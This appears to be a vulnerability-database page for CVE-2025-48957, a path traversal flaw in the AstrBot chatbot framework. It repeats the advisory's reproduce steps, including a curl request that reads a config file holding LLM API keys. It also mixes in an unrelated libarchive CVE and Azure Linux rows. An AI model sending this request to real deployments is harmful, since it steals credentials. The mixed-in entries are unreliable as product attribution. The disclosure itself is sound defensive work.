CVE-2025-48957
published 2025-06-02CVE-2025-48957: AstrBot is a large language model chatbot and development framework. A path traversal vulnerability present in versions 3.4.4 through 3.5.12 may lead to…
PriorityP343high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
0.62%
45.1th percentile
AstrBot is a large language model chatbot and development framework. A path traversal vulnerability present in versions 3.4.4 through 3.5.12 may lead to information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data. The vulnerability has been addressed in Pull Request #1676 and is included in version 3.5.13. As a workaround, users can edit the `cmd_config.json` file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later to fully resolve this issue.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| astrbot | astrbot | >= 3.4.4 < 3.5.13 | 3.5.13 |
| astrbot | astrbot | >= 3.4.4 < 3.5.13 | 3.5.13 |
| astrbotdevs | astrbot | — | — |
| msrc | azl3_libarchive_3.7.1-2_on_azure_linux_3.0 | — | — |
| msrc | azl3_libarchive_3.7.7-1_on_azure_linux_3.0 | — | — |
| msrc | cbl2_libarchive_3.6.1-4_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_libarchive_3.6.1-6_on_cbl_mariner_2.0 | — | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_msrc7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
ghsa·2025-06-04
CVE-2025-48957 [HIGH] CWE-23 AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
### Impact
This vulnerability may lead to:
* Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.
### Reproduce
Follow these steps to set up a test environment for reproducing the vulnerability:
1. Install dependencies and clone the repository:
```bash
pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py
```
2. Alternatively, deploy the program via pip:
```bash
mkdir astrbot && cd astrbot
uvx astrbot init
uvx astrbot run
```
3. In another terminal, run the following command to exploit the vulnerability:
```bash
curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json
```
This request will read the
OSV
AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
osv·2025-06-04
CVE-2025-48957 [HIGH] AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
### Impact
This vulnerability may lead to:
* Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.
### Reproduce
Follow these steps to set up a test environment for reproducing the vulnerability:
1. Install dependencies and clone the repository:
```bash
pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py
```
2. Alternatively, deploy the program via pip:
```bash
mkdir astrbot && cd astrbot
uvx astrbot init
uvx astrbot run
```
3. In another terminal, run the following command to exploit the vulnerability:
```bash
curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json
```
This request will read the
Microsoft
execute_filter_audio in archive_read_support_format_rar.c in libarchive before 3.7.5 allows out-of-bounds access via a crafted archive file because src can move beyond dst.
vendor_msrc·2024-10-08·CVSS 7.8
CVE-2024-48957 [HIGH] CWE-125 execute_filter_audio in archive_read_support_format_rar.c in libarchive before 3.7.5 allows out-of-bounds access via a crafted archive file because src can move beyond dst.
execute_filter_audio in archive_read_support_format_rar.c in libarchive before 3.7.5 allows out-of-bounds access via a crafted archive file because src can move beyond dst.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Marin
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/AstrBotDevs/AstrBot/commit/cceadf222c46813c7f41115b40d371e7eb91e492https://github.com/AstrBotDevs/AstrBot/issues/1675https://github.com/AstrBotDevs/AstrBot/pull/1676https://github.com/AstrBotDevs/AstrBot/security/advisories/GHSA-cq37-g2qp-3c2phttps://www.vicarius.io/vsociety/posts/cve-2025-48957-detect-astrbot-dashboard-vulnerability?prevUrl=wizardhttps://www.vicarius.io/vsociety/posts/cve-2025-48957-mitigate-astrbot-dashboard-vulnerability?prevUrl=wizardhttps://github.com/AstrBotDevs/AstrBot/security/advisories/GHSA-cq37-g2qp-3c2p
2025-06-02
Published